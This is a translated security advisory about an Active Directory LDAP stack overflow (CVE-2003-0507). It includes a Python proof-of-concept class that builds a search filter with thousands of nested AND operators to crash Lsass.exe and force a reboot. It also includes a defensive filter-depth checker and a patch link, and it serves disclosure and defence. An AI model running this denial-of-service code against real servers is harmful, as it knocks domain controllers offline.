Microsoft Windows Active Directory Remote Stack Overflow Vulnerability

Published: 2003-07-02
Updated: 2003-07-04

Affected systems:
Microsoft Active Directory
    - Microsoft Windows 2000 Server
Description:
BUGTRAQ ID: 7930
CVE(CAN) ID: CVE-2003-0507

Windows Active Directory is a core component of the Windows 2000 architecture and a powerful directory service publicly provided by Microsoft.

The LDAP version 3 search request handling in Windows Active Directory lacks proper buffer bounds checking on user-submitted requests. A remote attacker can exploit this to trigger a buffer overflow and crash the Lsass.exe service.

The directory service provided by Active Directory is based on the LDAP protocol, which it uses to store and retrieve Active Directory objects. Active Directory's handling of the LDAP version 3 'search request' operation is flawed: if an attacker constructs a request containing more than 1000 nested "AND" operators and sends it to the server, a stack overflow is triggered that crashes the Lsass.exe service, and the system reboots within 30 seconds.

<*Source: CORE Security Technologies Advisories (advisories@coresecurity.com)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105716669921775&w=2
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

CORE Security Technologies Advisories (advisories@coresecurity.com) provided the following test method:

Below is a Python test script:

------------------------------------
# Ldap and asn1 are helper modules from the original CORE advisory and are
# not included in this excerpt; the calls below assume their interface.
class ActiveDirectoryDOS( Ldap ):

    def __init__(self):
        self._s = None
        self.host = '192.168.0.1'
        self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
        self.port = 389
        self.buffer = ''
        self.msg_id = 1
        Ldap.__init__(self)   # the original called Ldap.__init__() without self

    def generateFilter_BinaryOp( self, filter ):
        # encode (attribute, value) as two OCTET STRINGs under the filter's tag
        filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
        filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
        return filterBuffer

    def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
        # wrap the simple filter in numTimes nested AND operators
        simpleBinOp = self.generateFilter_BinaryOp( filter )
        filterBuffer = simpleBinOp
        for cnt in range( 0, numTimes ):
            filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
        return filterBuffer

    def searchSub( self, filterBuffer ):
        self.bindRequest()
        self.searchRequest( filterBuffer )

    def run(self, host = '', basedn = '', name = '' ):
        # the machine must not exist
        machine_name = 'xaxax'

        filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

        # execute the anonymous query
        print 'executing query'
        filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
        self.searchSub( filterBuffer )
------------------------------------
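As an added defensive example (not part of the CORE advisory or of NSFOCUS's text), the following Python code measures the AND/OR/NOT nesting depth of a BER-encoded LDAP search filter without recursion and rejects a request once it exceeds a limit, which is the kind of check an LDAP front end or filtering proxy would apply to requests like the one described above. The `ber_*` helpers, the `MAX_NESTING` value and the constructed `name=xaxax` leaf are this example's own assumptions; `nested_and` only rebuilds the filter shape already shown in the script so the check can be exercised offline.

```python
LDAP_FILTER_AND, LDAP_FILTER_OR, LDAP_FILTER_NOT = 0xA0, 0xA1, 0xA2  # RFC 2251 Filter tags
LDAP_FILTER_EQUALITY, OCTET_STRING = 0xA3, 0x04
MAX_NESTING = 100  # assumed policy limit; the advisory says >1000 nested ANDs crash Lsass.exe

def ber_tlv(tag, payload):  # one BER element with a definite short- or long-form length
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload

def ber_len(buf, pos):  # decode the BER length at buf[pos] -> (length, content offset)
    first = buf[pos]
    if first < 0x80:
        return first, pos + 1
    n = first & 0x7F
    if n == 0 or pos + 1 + n > len(buf):
        raise ValueError("indefinite or truncated BER length")
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n

# Constructed sample leaf (name=xaxax): the non-existent machine the script searches for.
LEAF = ber_tlv(LDAP_FILTER_EQUALITY,
               ber_tlv(OCTET_STRING, b"name") + ber_tlv(OCTET_STRING, b"xaxax"))

def nested_and(leaf, times):  # wrap leaf in `times` ANDs: the filter shape the script builds
    buf = leaf
    for _ in range(times):
        buf = ber_tlv(LDAP_FILTER_AND, buf + leaf)
    return buf

def filter_depth(buf, limit=MAX_NESTING):
    # Max AND/OR/NOT nesting depth; raises as soon as `limit` is exceeded. Deliberately
    # iterative: a recursive walker would overflow its own stack on the input it should reject.
    stack, pos, max_depth = [], 0, 0  # stack holds end offsets of open constructed elements
    while pos < len(buf):
        while stack and pos >= stack[-1]:
            stack.pop()
        tag = buf[pos]
        length, body = ber_len(buf, pos + 1)
        end = body + length
        if end > len(buf):
            raise ValueError("truncated filter element")
        if tag in (LDAP_FILTER_AND, LDAP_FILTER_OR, LDAP_FILTER_NOT):
            stack.append(end)
            max_depth = max(max_depth, len(stack))
            if max_depth > limit:
                raise ValueError("filter nesting exceeds limit")
            pos = body  # descend into the constructed element
        else:
            pos = end  # leaf: skip its contents
    return max_depth
```

Because the check bails out at the first element past the limit, a hostile request is rejected after reading only a few hundred bytes rather than after parsing the whole filter.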

Recommendation:
Vendor patch:

Microsoft
---------
The vendor has released an upgrade patch to fix this security problem; please download it from the vendor's home page:

Download Windows 2000 SP4
http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

This advisory was translated and compiled by NSFOCUS; all rights reserved, reproduction without permission is prohibited.